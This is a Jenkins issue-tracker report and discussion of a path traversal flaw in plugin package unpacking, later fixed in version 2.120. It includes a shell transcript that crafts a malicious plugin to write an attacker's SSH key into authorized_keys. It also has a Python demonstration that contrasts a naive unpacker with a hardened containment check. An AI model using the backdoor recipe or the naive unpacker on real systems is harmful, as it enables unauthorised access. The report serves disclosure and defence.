JENKINS-32778: Jenkins plugin installation path traversal vulnerability


    Details

    • Type: Improvement
    • Status: Resolved
    • Priority: Minor
    • Resolution: Fixed
    • Component/s: core
    • Environment:
      Platforms: Jenkins
      Versions: 1.622

      Description

      Submitting as delegate for a Cisco pen-testing team.
      A vulnerability in the package installation process of Jenkins could allow an authenticated, remote attacker to effect a path traversal attack.

      The vulnerability is due to unsafe unpacking operations. An attacker could exploit this vulnerability by crafting a malicious plugin package and installing it themselves, or by tricking a victim into installing it on their Jenkins instance. An exploit could allow the attacker to write or overwrite files with elevated privileges, which could allow backdoor access, or a denial of service (DoS) condition.

      Headline: Path traversal during Jenkins plugin installation
      Platforms: Jenkins
      Versions: 1.622
      CWE Tags: CWE-25, CWE-541

      Jenkins allows administrators to install plugins that extend the core
      functionality of the system. Plugins are distributed in a single-file package
      (essentially a 'zip'/'jar' file) that is expanded at installation time. The
      process that expands plugin packages during installation contains a path
      traversal vulnerability that allows a malicious plugin package to write files to
      arbitrary locations on the underlying filesystem. This includes creating new
      files and directories and overwriting existing files.

      For example, a plugin package could overwrite Jenkins system configuration files
      or cryptographic secrets. It could create new users or jobs by writing new
      user/job configuration files. It could even create/overwrite an OS user's
      '.ssh/authorized_keys' file, thus creating a backdoor that may allow the
      attacker to SSH into the Jenkins server.

      Consider the following shell transcript illustrating how an attacker could
      create a malicious package that installs an attacker controlled SSH key.

      $ mkdir -p .ssh one/two

      $ ssh-keygen -t rsa -b 1024 -N "" -C jenkins -f .ssh/jenkins.id_rsa
      Generating public/private rsa key pair.
      Your identification has been saved in ./jenkins.id_rsa.
      Your public key has been saved in ./jenkins.id_rsa.pub.
      The key fingerprint is:
      96:6b:2e:0a:bb:07:d5:8d:97:b7:70:bb:4e:65:3f:bb jenkins
      The key's randomart image is:
      (randomart image omitted)

      $ ln -s jenkins.id_rsa.pub .ssh/authorized_keys

      $ jar cvf ssh_backdoor.hpi -C one/two/ ../../.ssh/authorized_keys
      added manifest
      adding: ../../.ssh/authorized_keys(in = 221) (out= 198)(deflated 10%)

      Note, the 'ssh_backdoor.hpi' plugin described above has been confirmed to
      successfully create an SSH backdoor on Jenkins 1.622 running on Ubuntu Linux
      (default installation via aptitude). Obviously, differences in installation
      paths and filesystem layout could affect the applicability of this example to
      other platforms.

      Clearly the behavior described above should not be permitted. To protect
      against such attacks, Jenkins developers should ensure that plugins are
      unpackaged and installed in isolated portions of the filesystem.
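      The following is an added example, not code from the report above or from the
      Jenkins fix in FilePath.java. It rebuilds the attack with a constructed in-memory
      archive (the entry name matches the transcript's '../../.ssh/authorized_keys'; the
      key material is a placeholder string) and runs it through two unpackers: a naive one
      that joins the entry name onto the target directory, as the report describes, and a
      hardened one that resolves each entry's destination and refuses anything that does
      not stay under the target directory. Note that Python's own ZipFile.extract()
      already strips '..' components, which is why the vulnerable routine writes entries
      by hand. The directory layout ($HOME/plugins/<plugin>/) is an assumption made so
      that two '..' hops land in the home directory, as in the Ubuntu test in the report.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

# Constructed sample data (not from the report): an .hpi is a plain zip, so
# a single entry named like the transcript's jar invocation produced is enough.
TRAVERSAL_ENTRY = "../../.ssh/authorized_keys"
FAKE_PUBKEY = b"ssh-rsa AAAAB3Nza...placeholder-not-a-real-key jenkins\n"


def build_hpi(entries: dict) -> bytes:
    """Build an in-memory .hpi/.jar (plain zip) with the given entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def unzip_naive(archive: bytes, dest: Path) -> list:
    """Vulnerable unpacker: joins dest with the entry name and trusts the result
    (the behaviour the report describes). Written by hand because
    zipfile.ZipFile.extract() would silently sanitise the name."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = dest / info.filename  # no containment check at all
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.resolve())
    return written


def resolve_entry(root: Path, name: str) -> Path:
    """Return where an entry would land, or raise ValueError if that is outside root.
    Comparing resolved paths (not string prefixes) catches '..', symlinks created
    by earlier entries, and sibling-prefix tricks such as root='/x', entry='../x2/f'."""
    if os.path.isabs(name) or name.startswith(("/", "\\")):
        raise ValueError(f"absolute entry name rejected: {name!r}")
    root = root.resolve()
    target = (root / name).resolve()
    if target != root and root not in target.parents:
        raise ValueError(f"entry escapes target directory: {name!r}")
    return target


def is_contained(root: str, name: str) -> bool:
    """Convenience predicate around resolve_entry for checking names in isolation."""
    try:
        resolve_entry(Path(root), name)
        return True
    except ValueError:
        return False


def unzip_hardened(archive: bytes, dest: Path) -> list:
    """Hardened unpacker: every entry must resolve to a path inside dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = resolve_entry(dest, info.filename)
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Unpack the constructed malicious plugin with both routines inside a scratch
    tree shaped like $HOME/plugins/<plugin>/ and report what happened."""
    archive = build_hpi({TRAVERSAL_ENTRY: FAKE_PUBKEY})
    with tempfile.TemporaryDirectory() as tmp:
        scratch = Path(tmp).resolve()
        home = scratch / "home" / "jenkins"
        plugin_dir = home / "plugins" / "ssh_backdoor"  # two levels below $HOME
        plugin_dir.mkdir(parents=True)

        naive = unzip_naive(archive, plugin_dir)
        escaped = [p for p in naive if plugin_dir not in p.parents]
        result = {
            "naive_wrote_authorized_keys": (home / ".ssh" / "authorized_keys").is_file(),
            "naive_escaped_entries": [str(p.relative_to(scratch)) for p in escaped],
        }
        try:
            unzip_hardened(archive, plugin_dir / "hardened")
            result["hardened_rejected"] = False
        except ValueError as exc:
            result["hardened_rejected"] = True
            result["hardened_error"] = str(exc)

        # A well-formed plugin still unpacks under the hardened routine.
        benign = build_hpi({"WEB-INF/lib/example.jar": b"not really a jar"})
        result["benign_unpacked"] = sorted(p.name for p in unzip_hardened(benign, plugin_dir / "benign"))
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

      Running the block shows the naive routine creating home/jenkins/.ssh/authorized_keys
      from inside home/jenkins/plugins/ssh_backdoor, while the hardened routine raises on
      the same entry and still unpacks a normal plugin. The containment test deliberately
      uses Path.parents on resolved paths rather than a string startswith() on canonical
      paths, because a prefix comparison without a trailing separator would accept
      /opt/jenkins2 as being inside /opt/jenkins.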

      References:
      http://cwe.mitre.org/data/definitions/25.html
      http://cwe.mitre.org/data/definitions/641.html


          Activity

          danielbeck Daniel Beck added a comment -

          Anyone opposed to just moving this to JENKINS? It seems consensus here is that it's not an exploitable bug (if you get someone to install your maliciously crafted plugin, they have a problem anyway), so keeping the information on this private would be unnecessary.

          jglick Jesse Glick added a comment -

          consider a new feature that allowed an administrator to upload a 'skin' package that changed colors, logos, style sheets, etc. Such a package wouldn't run any code after installation, but depending on the implementation it may reuse this code that unpackages 'jar'/'zip' files.

          I would not recommend that such a feature be created, but if it were (as a plugin on the update site), it would be the responsibility of the plugin author to ensure that all submitted ZIP files were treated as potentially malicious and the contents checked accordingly. If and when such a feature is created and the author is negligent about security and someone discovers this, file a SECURITY report and the plugin can be either fixed or blacklisted.

          oleg_nenashev Oleg Nenashev added a comment -

          Reopening since we agreed to merge https://github.com/jenkinsci/jenkins/pull/3402
          It is not considered as a security defect though

          scm_issue_link SCM/JIRA link daemon added a comment -

          Code changed in jenkins
          User: aviadatsnyk
          Path:
          core/src/main/java/hudson/FilePath.java
          http://jenkins-ci.org/commit/jenkins/8ede53387ec060a7c343e32efe808b1016f0c10c
          Log:
          JENKINS-32778 - Prevent extracting archived plugins outside of target path (#3402)

          *NOTE:* This service has been marked for deprecation: https://developer.github.com/changes/2018-04-25-github-services-deprecation/

          Functionality will be removed from GitHub.com on January 31st, 2019.

          danielbeck Daniel Beck added a comment -

          Fixed in 2.120.


            People

            • Assignee: Unassigned
            • Reporter: crlorent Craig Lorentzen
            • Votes: 0
            • Watchers: 7